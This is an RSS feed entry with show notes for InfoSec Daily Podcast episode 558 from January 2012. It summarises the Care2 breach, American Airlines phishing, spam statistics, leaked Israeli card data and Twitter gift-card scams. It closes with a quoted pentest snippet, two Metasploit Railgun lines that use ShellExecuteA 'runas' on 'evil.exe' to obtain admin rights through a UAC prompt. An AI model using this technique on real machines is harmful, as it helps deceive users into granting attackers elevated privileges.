	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.care2.com/care2blog/to-all-care2-members-security-breach.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.care2.com/care2blog/to-all-care2-members-security-breach.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The website of Care2, an organization that&rsquo;s all about living a healthy, green lifestyle, has been breached in the last days of December by an unknown hacker team that managed to access the login information belonging to a number of the site&rsquo;s members.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The official statement released by the company claims that only a limited number of Care2 member accounts were accessed by the cybercriminals, but as a precaution measure, all their 17,911,623 account holders are forced to change their passwords on their next log-in.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We sincerely apologize for this inconvenience. Given our large membership size, we have become a significant target for spammers and hackers over the past few years, and this was the first hacking attempt that successfully breached our protective walls,&rdquo; Care2 representatives wrote on the site&rsquo;s blog.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vulnerabilities which the hackers used to penetrate the site&rsquo;s defenses were immediately patched up to prevent further access, but the incident is still being investigated to determine the full extent of the breach.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI has been contacted to investigate the matter, but so far, the only clues to point to the identity of the attackers are some IP addresses from Russia. This, however, doesn&rsquo;t necessarily prove that the attack was launched from there. It could be that the hackers compromised devices from this certain location.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since no financial information is stored in the site&rsquo;s databases, the hackers may have targeted Care2 in order to obtain passwords which they can later use to gain access to other accounts, including ones that contain more sensitive data.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is exactly why customers are advised not only to change their passwords on the breached site, but also on others that share the same credentials. This procedure has to be done in the shortest time since after they get their hands on the loot, the crooks will try to make the best of it before their victims get to do anything about it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/American-Airlines-Fake-Ticket-Purchase-Scams-Hit-the-Roof-243983.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/American-Airlines-Fake-Ticket-Purchase-Scams-Hit-the-Roof-243983.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest fraudulent emails that target American Airlines customers, but these scams recorded a considerable increase and that&rsquo;s why I think this is a good opportunity to remind everyone of the plots. Also, we&rsquo;ll take a look at the company&rsquo;s official statement on the matter.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After reading the previous article, tens of readers shared the fake emails they received in which they were alerted on the fact that a ticket had been purchased using their</span><a href="http://news.softpedia.com/news/American-Airlines-Fake-Ticket-Purchase-Scams-Hit-the-Roof-243983.shtml#"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> credit cards</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The phony emails that bear the subject &ldquo;Re: Your Flight Order N590&rdquo; look something like this:</span></p>
<p>	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dear Customer,</span><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FLIGHT ELECTRONIC NUMBER 8532856</span><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DATE &amp; TIME / NOVEMBER 28, 2011, 11:17 PM</span><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ARRIVING: </span><a href="http://youvebeenpwned.org/"><span style="font-size:15px;font-family:Courier New;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">NEW YORK JFK</span></a><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">TOTAL PRICE : 278.02 USD</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Targeted customers report that the name of the destination may vary, Tulsa, Worcester, Oxnard, Stockton, Long Beach, Chicago and Houston being among the names mentioned in the email.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since they noticed that the number of false notices increased considerably and even moved to target fax machines, the company quickly acted on informing flyers about the malicious plot.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;American Airlines will never ask you to perform security-related changes to your account in this fashion or send emails to collect user names, passwords, email addresses or other personal information,&rdquo; reads the company&rsquo;s</span><a href="http://www.aa.com/i18n/urls/phishingEmails.jsp"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> statement</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;If you receive an email claiming to be from American Airlines, that asks for account information, it should be considered fraudulent and an attempt to obtain personal information that may be used to commit fraud. If you receive a phishing fax, please disregard and destroy the fax.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Users who come across similar emails or even faxes are advised to immediately delete them to protect themselves from whatever may be hiding behind the attachments or the links that accompany the messages.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition, here are certain things that can give away the true identity of such a phony notice:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- phony messages always ask for personal information;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- they address the recipient with generic titles such as &ldquo;dear customer;&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- they make false threats and claims, alerting users that their accounts will be terminated or their credit cards will be charged;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- in most cases, they are full of typos or poor grammar since a majority are sent by cybercriminals from other countries than the US.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.news24.com/SciTech/News/India-becomes-junk-mail-hotspot-20120103"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.news24.com/SciTech/News/India-becomes-junk-mail-hotspot-20120103</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">India has emerged as the world&#39;s top source of junk mail as spammers make use of lax laws and absent enforcement to turn the country into a centre of unsolicited e-mail.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A recent report by Kaspersky Lab, a Moscow-based global internet security firm, says more spam was sent from the south Asian giant than anywhere else in the world in the third quarter of the year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An average of 79.8% of e-mail traffic in the three months to the end of September was junk. Of that, 14.8% originated in India, 10.6% came from Indonesia, and 9.7% from Brazil.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Darya Gudkova, a spam analyst at Kaspersky, said the statistics reflect a growing trend for spam to be sent from computers in Asian and Latin America countries.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.jpost.com/International/Article.aspx?id=251943&amp;R=R4"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.jpost.com/International/Article.aspx?id=251943&amp;R=R4</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers published the list of cards, names and other personal details on the One sports website, which was hacked.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers published a 30 megabyte file containing the details. &nbsp;Israeli credit card companies have urged their customers to remain calm, and said they are taking all the required steps to secure credit accounts.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visa CAL announced that it would suspend all accounts that were detailed in the post. The company said it would contact the affected customers Tuesday and issue them new credit cards.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Bank of Israel announced it would review the matter.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Army Radio, the hackers encouraged readers to use the information posted online to make purchases, and said they &nbsp;would continue to publish more account information already in their possession.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trend recently found </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> spam touting &ldquo;gift cards&rdquo; at the tail-end of the gift-giving season. In this run, </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> users are lured into clicking a shortened URL with the strings &ldquo;#mcdonalds gift card.&rdquo; McDonald&rsquo;s is a globally well-known fast food chain that, like many other establishments, do offer certificates and vouchers for patrons who would like to give these as gifts or rewards.</span><img height="409px;" src="https://lh3.googleusercontent.com/dJG1Ur2nRAAhX-12cwC0deMnB8YSmaGCAm1PynD4muCsJzApCt38W8aHutHr2Ku-v1FWM9GqJimJmpCbFtX_FmweMdsY755ieqadE9pDi8SwRcHqOAg" width="430px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately, closer inspection of the shortened link reveals a URL that doesn&rsquo;t seem to have anything to do with McDonald&rsquo;s gift certificates.</span><img height="118px;" src="https://lh6.googleusercontent.com/rYgdc4zPwQngLx8X-K4nL_LrUsOFgST2-8lQwAMZdqr_px8qB2J6nydqpZKMDvOl80gnI15KLlNMtcysGsIb5896QcJ248kKyWMDZzRYjAPjo-kmKwQ" width="430px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Instead, the link leads to the following site:</span><img height="330px;" src="https://lh3.googleusercontent.com/VE7M0eROrtiDPF73oVPZyWA2dQwLvYv_UFWIRS_H0SGhaJ7WdRRlfPJ86i1Dp0I3KnoftAh3EfVj5movqEyJAa-vWO-HOUl6sWa0f0TZnEtFeOznfgk" width="430px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Clicking the &ldquo;Join Now&rdquo; button leads to some redirections that finally lands the page to an adult dating site. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We consider the URLs used in this attack as malicious because of the deceitful nature by which they are used. The lure &ldquo;#mcdonald&rsquo;s gift card&rdquo; would have definitely led several users to believe that some gift certificates or vouchers are being given away or discounted.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A couple of weeks ago of weeks ago in the US, attention was drawn to</span><a href="http://www.huffingtonpost.com/2011/12/20/mcdonalds-mystery-santa_n_1161278.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">a Mystery Santa</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> who donated $500 worth of gift cards from McDonald&rsquo;s to a nearby homeless shelter. Whether or not cybercriminals got a social engineering idea from this cannot be confirmed, but in all cases users are advised against clicking on links without first inspecting them. In this case, hovering on the link would have given users a clue about how to proceed. Another context clue in the illegitimacy of this spam is how users may find themselves being mentioned in the same tweet with unfamiliar users or users that they do not normally follow. This is due to how the spam bot mentions </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> accounts that have been victimized in the same spammed tweet.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IF TIME: them mubix blog regarding UAC elevation</span><br />
	<a href="http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A number of times during tests I&#39;ve actually run into those mythical creatures called &quot;patched windows machines&quot;. At</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">DerbyCon</span></a><a href="http://twitter.com/carnal0wnage"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Chris Gates</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and I released the &quot;Ask&quot; post module (which I had failed to publish). This module very simply uses the</span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/bb762153%28v=vs.85%29.aspx"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ShellExecute windows function</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> via</span><a href="http://dev.metasploit.com/redmine/projects/framework/wiki/RailgunUsage"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Railgun</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with the undocumented (but very well known) operator of &#39;runas&#39;.</span></p>
<p>	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">client.railgun.add_function( &#39;shell32&#39;, &#39;ShellExecuteA&#39;, &#39;DWORD&#39;,[[&quot;DWORD&quot;,&quot;hwnd&quot;,&quot;in&quot;],[&quot;PCHAR&quot;,&quot;lpOperation&quot;,&quot;in&quot;],[&quot;PCHAR&quot;,&quot;lpFile&quot;,&quot;in&quot;],[&quot;PCHAR&quot;,&quot;lpParameters&quot;,&quot;in&quot;],[&quot;PCHAR&quot;,&quot;lpDirectory&quot;,&quot;in&quot;],[&quot;DWORD&quot;,&quot;nShowCmd&quot;,&quot;in&quot;],])<br class="kix-line-break" /><br />
	</span><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">client.railgun.shell32.ShellExecuteA(nil,&quot;runas&quot;,&quot;evil.exe&quot;,nil,nil,5)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This would quite simply prompt the user with that annoying UAC prompt asking the user to run &#39;</span><span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">evil.exe</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#39; with Administrative privs. If they are not &quot;Admins&quot; themselves then it would prompt them for the user name and password. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-558-care2-aa-phishing-yea-india-israel-cc-bigmac-scamspam/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3326/0/infosec-daily-podcast-episode-558.mp3" length="19949545" type="audio/mpeg" />
		<itunes:duration>0:41:31</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 558 for January 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 558 for January 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.care2.com/care2blog/to-all-care2-members-security-breach.html
The website of Care2, an organization that&#8217;s all about living a healthy, green lifestyle, has been breached in the last days of December by an unknown hacker team that managed to access the login information belonging to a number of the site&#8217;s members.
	The official statement released by the company claims that only a limited number of Care2 member accounts were accessed by the cybercriminals, but as a precaution measure, all their 17,911,623 account holders are forced to change their passwords on their next log-in.
